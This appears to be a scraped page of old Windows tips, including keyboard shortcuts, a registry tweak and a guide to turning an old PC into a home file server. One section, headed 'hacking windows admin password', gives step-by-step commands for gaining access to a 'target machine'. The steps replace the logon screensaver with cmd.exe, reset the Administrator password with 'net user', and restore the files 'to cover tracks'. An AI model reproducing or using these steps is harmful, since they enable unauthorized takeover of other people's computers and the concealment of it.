19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons

Creating a 3D window effect

1. Start Regedit

2. Go to HKEY_CURRENT_USER \ Control Panel \ Colors

3. Make sure the following setting are there:

* ButtonHilight=128 128 128
* ButtonShadow=255 255 255

hacking windows admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called admin and you want the password abcd enter this

"net user admin abcd"

and this changes the password on admin machine to abcd and you r in.

But i was not able to execute this on xp-2 it works on win 200o standalone machine.

Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

turn your old pc to File server

Turn your old PC into a File Server

If you want to give that old computer new life on your home network, try using it as a file server for music or pictures or whatever so that no matter where in the house you are you can access your massive digital library from any computer. Here’s what you’ll need to do…

Connection

You’ll need a home network. If you don’t you’ll need to buy a home network router ($50–$75 USD from DLink, Linksys, Netgear, etc.) and connect it to you high speed Internet connection and connect all your computers to it, including the old computer you are going to turn into a server.

Requirements

You will need to make sure that there’s enough hard drive space for all your files. Really old computers will have hard drives that are less than 10 GB, so you might consider adding a new larger hard drive. An old Pentium II or better with a 10 GB hard drive is probably your best bet.

Network Card

Check to see that the computer has a network card so it can be connected to the network. Most older computers will have 10 Megabit Ethernet cards which should be fine, but you might consider upgrading to a newer 100 Mbit or Gigabit card.

Sharing

1) Put all your files on the computer in a folder called FILES on the Desktop (or you could name it DATA or anything else…just make it memorable and one word. In the example below I’ll continue to use the name FILES.)

2) For easy identification on the network you might consider renaming the computer SERVER (or FILESERVER) in Control Panel under Network and Identification Tab (in Windows 98).

3) Right click on the FILES folder to activate sharing and give the shared folder a name on the network. You may have to run the file and printer sharing wizard first then right click and activate sharing after this.

4) On the SERVER computer click START then Run then type cmd (if you have XP or Me) or command (if you have Windows 95/98) to get a DOS box.

5) At the C:> prompt type ipconfig (and hit return) to see what the computer’s IP address is.

Acquire

Now go the computer on your network where you want to play the files on. Start Windows Explorer. Here we’ll assign the SERVER computer as a network drive. You have a C drive which is your main hard drive. You have a D drive wihich is usually a CD or DVD drive. Your SERVER can become yet another drive letter. Maybe your Z: drive or your X: drive.

In Windows Explorer at the top click the Tools menu then click Map Network Drive option. Under “Drive:” choose a drive letter that the SERVER will be assigned. It can be any unassigned drive letter. Z: or X: or whatever you want.

In the “Folder” field, type the IP address of the SERVER and add the name of the folder that you shared. It should look something like: \\192.168.1.104\FILES. Then click Finish.

If you named the computer DATA, you could also use \\SERVER\DATA\

Now all those files are now accessible via the network as your Z drive. Enjoy
